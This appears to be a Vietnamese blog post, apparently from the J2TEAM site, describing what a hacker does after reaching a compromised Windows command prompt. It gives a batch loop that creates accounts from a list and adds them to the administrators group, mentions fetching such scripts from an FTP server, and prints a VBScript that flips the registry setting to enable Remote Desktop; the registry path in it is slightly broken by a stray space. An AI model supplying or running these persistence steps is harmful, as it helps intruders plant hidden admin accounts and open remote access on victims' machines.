1. Tạo User trong môi trường Dos:
Rất nhiều lỗi kiến cho máy tính bị chiếm quyền điều khiển và hacker có thể kết nối tới giao diện DOS của máy tính. ( Cách khai thác một số lỗi cơ bản chúng ta không bàn ở chủ đề này mà để một bài viết gần đây). Khi đã kết nối tới Command Promt việc hacker thường làm là tạo ra một tài khoản thuộc nhóm Admin. Câu lệnh như sau:
for /f "tokens=1,2" %%x in (userlist.txt) do net user %%x %%y /add
for /f %%x in (userlist.txt) do net localgroup administrators %%x /add
Phần userlist.txt thì nội dung như sau:
thaona 123456
nathao 123456
Có thể save file thành Script cho dễ thực hiện ( thường hacker đã có sẵn script và load từ ftp server xuống để chạy
2. Sau khi đã có tài khoản admin rồi tiếp theo là gì nhỉ? Enable remote desktop trong môi trường DOS luôn chứ?
Lúc này lại sử dụng môt VB script để enable Remote Desktop
Option Explicit
Dim WSHShell, n, MyBox, p, t, mustboot, errnum, vers
Dim enab, disab, jobfunc, itemtype
Set WSHShell = WScript.CreateObject("WScript.Shell")
p = "HKLM\SYSTEM\CurrentControlSet\Control\Termina l Server\"
p = p & "fDenyTSConnections"
itemtype = "REG_DWORD"
Err.Clear
On Error Resume Next
n = WSHShell.RegRead (p)
On Error Goto 0
errnum = Err.Number
if errnum <> 0 then
WSHShell.RegWrite p, 0, itemtype
End If
If n = 0 Then
n = 1
WSHShell.RegWrite p, n, itemtype
ElseIf n = 1 then
n = 0
WSHShell.RegWrite p, n, itemtype
End If
J2TEAM Security: A must-have extension for Chrome users.
Install now!
My name is Manh Tuan. I'm the leader of J2TEAM, the team behind J2TEAM Security, J2TEAM Cookies, Death Click and J2TEAM Community.